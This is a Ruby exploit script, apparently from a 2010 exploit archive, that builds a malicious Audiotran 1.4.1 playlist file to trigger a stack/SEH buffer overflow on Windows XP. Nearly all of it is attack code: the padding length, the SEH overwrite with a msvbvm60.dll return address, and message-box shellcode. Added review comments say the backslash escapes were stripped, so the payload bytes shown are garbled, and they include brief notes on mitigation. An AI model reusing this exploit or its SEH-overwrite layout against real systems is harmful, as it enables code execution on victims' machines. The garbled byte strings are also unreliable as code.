
# Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
# Published : 2010-01-10
# Author : Sébastien Duquette


#!/usr/bin/ruby
#
# Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
# Date          : January 9th, 2010
# Author        : Sébastien Duquette
# Software Link : http://www.e-soft.co.uk/Audiotran.htm
# Version       : 1.4.1
# OS            : Windows
# Tested on     : XP SP2/SP3 En (VMware)
# Type of vuln  : Stack Overflow / SEH
# Greetz to     : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
#

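# Banner printed before the file is generated.
#
# NOTE(review): the page extraction appears to have stripped the
# backslashes from the escape sequences in the literals below ("|n" at
# the end of each banner line, "x.." pairs in the payload). As shown,
# these strings are plain ASCII text, not newlines or raw bytes; the
# escapes are deliberately not reconstructed here.
banner =
"|------------------------------------------------------------------|n" +
"|                         __               __                      |n" +
"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n" +
"|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n" +
"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n" +
"| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n" +
"|                                                                  |n" +
"|                                       http://www.corelan.be:8800 |n" +
"|                                                                  |n" +
"|-------------------------------------------------[ EIP Hunters ]--|nn"

# Corelan Team MsgBox
# Payload placed after the SEH record (see file layout below). Per the
# header comment it is a message-box proof of concept.
payload =
"xebx22x56x31xc0x64x8bx40x30x85xc0x78" +
"x0cx8bx40x0cx8bx70x1cxadx8bx40x08xeb" +
"x09x8bx40x34x8dx40x7cx8bx40x3cx5exc3" +
"xebx69x60x8bx6cx24x24x8bx45x3cx8bx54" +
"x05x78x01xeax8bx4ax18x8bx5ax20x01xeb" +
"xe3x34x49x8bx34x8bx01xeex31xffx31xc0" +
"xfcxacx84xc0x74x07xc1xcfx0dx01xc7xeb" +
"xf4x3bx7cx24x28x75xe1x8bx5ax24x01xeb" +
"x66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8b" +
"x01xe8x89x44x24x1cx61xc3xadx50x52xe8" +
"xaaxffxffxffx89x07x44x44x44x44x44x44" +
"x44x44x47x47x47x47x39xcex75xe6xc3x4c" +
"x4cx4cx4cx89xe5xe8x68xffxffxffx89xc2" +
"xebx1cx5ex8dx7dx04x89xf1x80xc1x0cxe8" +
"xc8xffxffxffxebx15x31xd2x59x88x51x36" +
"x51x52xffx54x24x0cxe8xdfxffxffxffx57" +
"x7fx29x62xe8xe6xffxffxffx43x6fx72x65" +
"x6cx61x6ex20x54x65x61x6dx20x53x68x65" +
"x6cx6cx63x6fx64x65x20x2dx20x50x72x6f" +
"x67x72x61x6dx20x65x78x70x6cx6fx69x74" +
"x65x64x20x73x75x63x65x73x73x66x75x6c" +
"x6cx79x58"

print banner
puts "[+] Exploit for Audiotran 1.4.1."

# Output written to the current working directory.
filename = "audiotran_poc.pls"

# File layout, in order (a classic SEH-overwrite proof of concept for the
# stack overflow named in the header):
#   1308 bytes  padding up to the SEH record
#      4 bytes  next-SEH slot (the author's short-jump bytes)
#      4 bytes  SEH handler slot, overwritten with a fixed address the
#               original comment attributes to msvbvm60.dll
#   payload     shellcode
#   9000 bytes  trailing padding
#
# Defensive note: the technique relies on a static handler address in a
# loaded module. SafeSEH-registered modules, DEP and ASLR are the standard
# mitigations for this class of bug; on the detection side, a playlist
# file of this size consisting mostly of repeated filler is anomalous.
#
# The block form guarantees the handle is closed even if a write raises,
# which the original File.new / f.close pair did not.
File.open(filename, 'w') do |f|
  f.write 'A' * 1308 #padding
  f.write "xebx06x90x90"
  f.write "xcbx75x52x73" # ret at 0x735275CB [msvbvm60.dll]
  f.write payload
  f.write 'A' * 9000 # padding
end

# The original line read "#(unknown)" here, which Ruby does not interpolate;
# "#{filename}" reports the actual output name.
puts "[+] Wrote exploit file : #{filename}."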